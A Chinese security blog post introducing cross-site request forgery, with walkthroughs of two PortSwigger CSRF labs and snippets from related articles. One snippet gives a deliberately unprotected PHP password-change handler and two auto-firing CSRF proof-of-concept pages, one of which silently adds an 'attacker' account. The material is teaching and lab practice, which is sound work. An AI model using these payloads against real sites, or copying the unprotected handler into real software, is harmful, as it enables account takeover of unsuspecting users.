跨站请求伪造CSRF漏洞介绍

最新推荐文章于 2025-08-06 15:54:05 发布
最新推荐文章于 2025-08-06 15:54:05 发布
阅读量1.1k 收藏 13
点赞数 30
CC 4.0 BY-SA版权
分类专栏: 网络安全Web基础 文章标签: csrf 安全 网络 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zakefine/article/details/145152315

一、CSRF介绍

1、CSRF概念

CSRF(Cross - Site Request Forgery),跨站请求伪造。它是一种网络安全漏洞,攻击者通过诱导用户访问恶意网站,利用用户当前已登录的身份在被攻击的网站(目标网站)执行非用户本意的操作。

2、漏洞利用流程图

画板

3、漏洞产生的原因

(1)信任用户的浏览器行为

浏览器自动发送认证凭据:当用户登录一个网站后,浏览器会保存该网站的认证信息,如 Cookie。在后续访问同一网站的其他页面或者相关接口时,浏览器会自动将这些认证信息包含在请求中发送给服务器。而 CSRF 攻击正是利用了这一点。

缺乏对请求来源的有效验证:浏览器本身不会区分请求是来自合法的用户操作还是来自恶意网站的诱导。它只是按照规则发送请求,而服务器如果没有采取措施来验证请求的真正来源,就容易受到 CSRF 攻击。

(2)网站应用程序设计缺陷

可预测的请求参数:如果网站的请求参数是可预测的,攻击者就更容易构造恶意请求。攻击者可以通过猜测或者分析,了解到这个接口的参数格式,然后在恶意网站中构造类似的请求来修改用户密码。而且,如果这个接口没有其他防护措施,就很容易被利用进行 CSRF 攻击。

对重要操作缺乏保护机制:对于一些重要的操作,如修改用户账户信息、执行财务交易等,如果没有这些措施,并且没有防范 CSRF 攻击的机制,如 CSRF 令牌,攻击者就可以轻易地利用用户的登录状态进行恶意操作。

同源策略的不恰当应用或绕过:虽然浏览器有同源策略来限制不同源的脚本交互,但 CSRF 攻击可以在一定程度上绕过这个策略。

二、CSRF漏洞练习

本次练习使用的靶场是portswigger,需要注册登录才能使用。篇幅有限,这里只演示两个关卡。

靶场链接:https://portswigger.net/web-security/csrf

每个关卡都有参考的解题步骤(Solution),不过是英文的而已!

1、Lab: CSRF vulnerability with no defenses

链接:https://portswigger.net/web-security/csrf/lab-no-defenses

(1)点击ACESS THE LAB进入实验,看一下本关用到的账号密码

(2)使用靶场提供的账号密码登录,发现这一关是构造恶意链接更改用户的邮箱

(3)填入要更形的邮箱地址,抓包,在Burp右键选择Engagement Tools-Generate CSRF PoC

(4)如果要更改邮箱地址,点击Regenerate,然后点击Copy HTML,在Burp把抓到的包丢弃掉

(5)回到靶场,点击Go to exploit server,在新页面打开

(6)把生成的CSRF PoC复制到body中,点击Store,View exploit,刷新邮箱页面,发现邮箱已经更新了

2、Lab: CSRF where token validation depends on request method

链接:https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-request-method

从这个token validation depends on request method标题就可以看出这一关是通过改变请求方式构造CSRF POC

(1)还是和上一关一样登录账号和抓包,可以看到这里用的是POST请求方法

(2)右键选择Change request method

(3)在右键选择Engagement Tools-Generate CSRF PoC,之后和上一关的步骤一致,不多赘述,把PoC内容复制,点击Deliver exploit to victim

(4)页面提示实验已经被解决

(5)点击View exploit更改邮箱,如果提示"That email is not available",更改一下邮箱后缀

(6)邮箱已成功更改

CSRF 跨站请求伪造
m0_69043895的博客
04-19 1330
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(),但它与XSS非常不同,XSS利用站内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比更具危险性。
跨站请求伪造(CSRF)总结和防御
m0_61869253的博客
05-11 1030
构建一个地址,比如说是删除某个博客网站博客的链接,然后诱使已经登录过该网站的用户击恶意链接,可能会导致用户通过自己的手将曾经发布在该网站的博客在不知情的情况下删除了。这种构建恶意链接,假借受害者的手造成损失的攻击方式就叫CSRF-跨站请求伪造
如何防止跨站请求伪造(CSRF)?
AI天才研究院
07-02 4235
作者:禅与计算机程序设计艺术 如何防止跨站请求伪造(CSRF)? 作为一名人工智能专家,程序员和软件架构师,防止跨站请求伪造(CSRF)是非常重要的任务。CSRF是一种常见的Web应用程序漏洞,攻击者可以利用该漏洞向用户的敏感信息发送请求,从而窃取用户的个人信息。在本文中,我
跨站请求伪造CSRF,Cross-Site Request Forgery)
坚定目标,超越自我
10-10 3100
由于跨站请求通常无法携带自定义头信息,因此检查请求中是否包含自定义头可以作为一种防御手段。使用自定义请求头是一种防御跨站请求伪造CSRF)攻击的技术。这种方法的基本思想是在客户端的请求中添加一个自定义的HTTP头部(Header),服务器端检查这个头部以验证请求的合法性。由于跨站请求通常无法设置自定义头部,这为服务器提供了一种简单的验证机制。
CSRF跨站请求伪造漏洞介绍
weixin_56233402的博客
07-28 1148
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行击,用户一旦击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。
跨站请求伪造(CSRF)漏洞详解
CoffeMilk的博客
09-21 1558
跨站请求伪造(Cross-site request forgery 简称:CSRF);是一种冒充受信任用户,向服务器发送非预期请求的攻击方式(它允许攻击者诱使用户执行他们不打算执行的操作;允许攻击者部分绕过同源策略,该策略旨在防止不同网站相互干扰)【CSRF主要利用的是网站对用户网页浏览器的信任】【XSS 利用的是用户对指定网站的信任】。 跨站请求伪造的攻击特性是危害性大但非常隐蔽,攻击者完全可以在用户毫无察觉的情况下发起CSRF攻击。
跨站请求伪造(CSRF)漏洞
qq_47848569的博客
05-31 693
CSRF的本质就是在不知情的情况下执行请求利用cookie在浏览器不过期的操作,使攻击者构造恶意的payload来修改用户的信息等pikachu靶场。
CSRF(跨站请求伪造)漏洞概述
2401_86835152的博客
04-15 763
5.浏览器在接收到这些攻击性代码后,根据网站 B 的请求,在用户不知情的情况下携带 Cookie 信息,向网站 A 发出请求。2.在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站 A;xss:攻击者发现 XSS 漏洞——构造代码——发送给受害人——受害人打开——攻击者获取受害人的 cookie——完成攻击。csrf:攻击者发现 CSRF 漏洞——构造代码——发送给受害人——受害人打开——受害人执行代码——完成攻击。
CSRF跨站请求伪造漏洞
大河之犬的博客
05-30 1393
CSRF跨站请求伪造)是一种攻击手段,攻击者通过伪装成受信任用户向受信任网站发送未经授权的请求,从而在用户不知情的情况下执行一些操作。简而言之,CSRF利用了用户的身份认证和信任来对网站进行未授权的操作。1、CSRF攻击的先决条件识别有价值的操作:攻击者需要找到值得利用的操作,例如更改用户的密码、电子邮件或提升权限。会话管理:用户的会话应仅通过cookie或HTTP基本身份验证标头管理,因为其他标头无法用于此目的进行操作。无法预测的参数:请求不应包含无法预测的参数,因为这些参数可能会阻止攻击。
「 典型安全漏洞系列 」03.跨站请求伪造CSRF详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-14 2271
CSRF 攻击通过在用户不知情的情况下,冒充用户身份向服务器发送请求。由于攻击者可以利用用户在站上已存在的 cookie 进行身份验证,所以这种攻击往往不易被察觉。它与常见的 XSS(跨站脚本攻击)攻击有相似之处,都是利用 Web 应用程序的安全漏洞进行攻击。CSRF常年位于CWE Top10,可见其危害性及普遍性。排名源自CWE官网Note:如果想了解CWE,请参阅「 网络安全常用术语解读 」通用缺陷枚举CWE详解。
web安全】——CSRF跨站请求伪造
wxh的博客
10-05 1515
可以在 HTTP 请求中以参数的形式加入一个随机产生的 token,并在服务器端建立一个拦截器来验证这token,如果请求中没有 token 或者 token 内容不正确,则认为可能是 CSRF 攻击而拒绝该请求CSRF 攻击之所以能够成功,是因为黑客可以完全伪造用户的请求,该请求中所有的用户验证信息都是存在于 cookie 中,因此黑客可以在不知道这些验证信息的情况下直接利用用户自己的 cookie 来通过安全验证。CSRF攻击的过程,往往是在用户不知情的情况下构造了网络请求
CSRF跨站请求伪造
没有网络安全就没有国家安全
08-20 940
Crose-Site Request Forgery,跨站请求伪造,攻击者利用服务器对用户的信任,从而欺骗受害者去服务器上执行受害者不知情的请求。在CSRF的攻击场景中,攻击者会伪造一个请求(一般为链接),然后欺骗用户进行击。用户一旦击,整个攻击也就完成了。所以CSRF攻击也被称为“one click”攻击。用户登录受信任的网站 A,并在本地生成了相应的 Cookie 用于身份验证。网站 A 没有对用户请求进行有效的同源验证。
关于Web前端安全防御CSRF攻防的几考虑
xyphf的博客
08-02 948
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种攻击方式,攻击者诱导用户在已登录目标网站的情况下,向该网站发送恶意请求,利用用户的身份凭证(如 Cookie)执行非预期操作(如转账、修改密码等)。
Web安全csrf、ssrf和xxe的区别
最新发布
qinjilll的博客
08-06 435
摘要: CSRF、SSRF和XXE是三种常见的网络安全漏洞,核心差异如下: CSRF:利用用户会话伪造请求,执行越权操作(如转账),需用户已登录且服务器未验证请求来源。防御措施包括CSRF Token和Referer检查。 SSRF:诱导服务器访问内网或本地资源(如数据库),危害包括内网探测和数据泄露。需限制URL协议并过滤内网IP。 XXE:通过XML解析器加载外部实体(如本地文件),导致敏感信息泄露。防御需禁用外部实体并使用安全解析库。 总结:CSRF冒充用户操作,SSRF利用服务器权限,XXE劫持XM
星图云开发者平台赋能商储油安全管控数字化转型
DevMate的博客
08-05 427
某商业储备油分公司是其集团公司国家原油商业储备的生产经营主体,肩负着15座跨省市油库的安全管理重任。在传统管理模式下,总部对分散库区的监管面临严峻挑战:由于地理位置分散,储罐液位波动、设备异常运行等关键状态无法实时获取,往往依赖人工逐级上报导致决策滞后;各库区独立建设的安防系统、设备监测平台数据格式互不兼容,标准不统一,形成数据协同壁垒;当突发泄漏或火灾险情时,应急资源调度依赖电话协调与纸质预案,响应效率难以满足快速处置要求。
数字取证和网络安全:了解两者的交叉和重要性
2302_82041293的博客
08-06 612
当代社会的数字格局在很大程度上依赖于数字取证和网络安全。由于人们对技术和互联网的依赖不断升级,网络威胁和攻击的风险大大增加。了解数字取证和网络安全的交叉对于保护您和您的组织免受网络威胁至关重要。
Goby 漏洞安全通告| NestJS DevTools /inspector/graph/interact 命令执行漏洞(CVE-2025-54782)
m0_46699477的博客
08-05 216
其 /inspector/graph/interact 接口存在远程代码执行漏洞(CVE-2025-54782)。攻击者可以通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。该漏洞允许攻击者通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。
Python包安全工程实践:构建安全可靠的Python生态系统
Programming Talk
08-05 220
建立了安全开发流程与规范实现了依赖安全管理与漏洞扫描应用了现代加密与安全通信技术设计了认证授权系统集成了安全审计与监控实施了漏洞管理与应急响应应用了安全测试技术保障了供应链安全完整安全示例可在GitHub查看:[安全工程示例仓库]零信任架构应用运行时应用自保护(RASP)机密计算技术合规自动化(如GDPR、CCPA)
Web 安全之开放重定向攻击(Open Redirect )详解
路多辛的所思所想
08-03 958
摘要: 开放重定向漏洞存在于网站不安全处理用户可控URL时,攻击者通过构造恶意链接将用户从可信网站重定向至钓鱼或恶意网站。攻击流程包括诱骗用户击、服务器执行重定向、最终实施窃取信息等攻击。防范措施包括避免直接使用用户输入URL、实施白名单验证、使用相对路径及重定向确认页面。该漏洞虽不直接破坏系统,但会显著提高钓鱼攻击成功率,需通过严格验证和定期安全审计加以防范。(149字)
跨站请求伪造CSRF实验
04-03
### 关于跨站请求伪造CSRF)实验的设计与实施 #### 实验目标 通过设计并执行一个简单的 CSRF 攻击场景,验证攻击的工作原理以及其可能带来的危害。这有助于理解 CSRF 的本质及其防御方法。 --- #### 实验环境准备 1. **本地开发服务器** 使用 Web 开发框架搭建一个支持用户登录功能的小型应用,例如 PHP 或 Python Flask 应用程序。该应用程序应允许修改用户的某些敏感数据(如密码),以便模拟真实世界中的业务逻辑。 2. **易受攻击的功能模块** 创建一个未加防护的 URL 接口用于更新用户密码或其他操作。例如: ```php <?php session_start(); if ($_SERVER['REQUEST_METHOD'] === 'GET') { $new_password = $_GET['password_new']; $confirm_password = $_GET['password_conf']; if ($new_password && $confirm_password && $new_password === $confirm_password) { echo "Password updated successfully!"; // Simulate password update logic here. } else { echo "Error updating password."; } } ?> ``` 3. **恶意页面构建** 构建一个 HTML 页面,其中包含能够触发 CSRF 攻击的内容。此页面可以通过诱导受害者访问来完成攻击过程。 --- #### 实现步骤 ##### 方法一:基于 GET 请求CSRF 测试 创建一个 HTML 文件,在文件中嵌入超链接或自动加载脚本以发起 CSRF 请求: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Test</title> </head> <body> <!-- 隐蔽的超链接 --> <a href="http://localhost/csrf_vulnerable_app/change_password.php?password_new=hacked&password_conf=hacked" style="display:none;" id="csrf-link"></a> <!-- 自动击链接 --> <script> document.getElementById('csrf-link').click(); </script> </body> </html> ``` 上述代码会在用户打开页面时立即发送一个 GET 请求到指定的目标地址[^4]。 ##### 方法二:基于 POST 请求CSRF 测试 如果目标接口仅接受 POST 请求,则可通过 `<form>` 表单提交方式实现 CSRF 攻击: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Form Attack</title> </head> <body onload="document.forms[0].submit()"> <form action="http://localhost/csrf_vulnerable_app/update_user.php" method="POST"> <input type="hidden" name="act" value="add"/> <input type="hidden" name="username" value="attacker"/> <input type="hidden" name="password" value="hackedpass"/> <input type="hidden" name="password2" value="hackedpass"/> <input type="hidden" name="button" value="%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7"/> <input type="hidden" name="userid" value="0"/> </form> </body> </html> ``` 当受害者浏览这个恶意页面时,浏览器会自动向目标站提交表单数据[^3]。 --- #### 安全测试注意事项 在实际环境中进行此类测试前需获得授权,以免触犯法律。此外,建议使用虚拟机隔离测试网络,防止意外影响其他系统资源。 --- #### 防御措施概述 为了有效抵御 CSRF 攻击,可采取以下策略之一或多组合使用: - 添加一次性令牌(Token)校验机制; - 设置严格的 Referer 和 Origin 头部检查; - 启用 SameSite Cookie 属性限制第三方调用行为[^1]。 --- ### 结论 通过对 CSRF 漏洞的学习和实践,可以更深刻认识到这类威胁的存在形式及潜在风险,并掌握相应的缓解手段。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值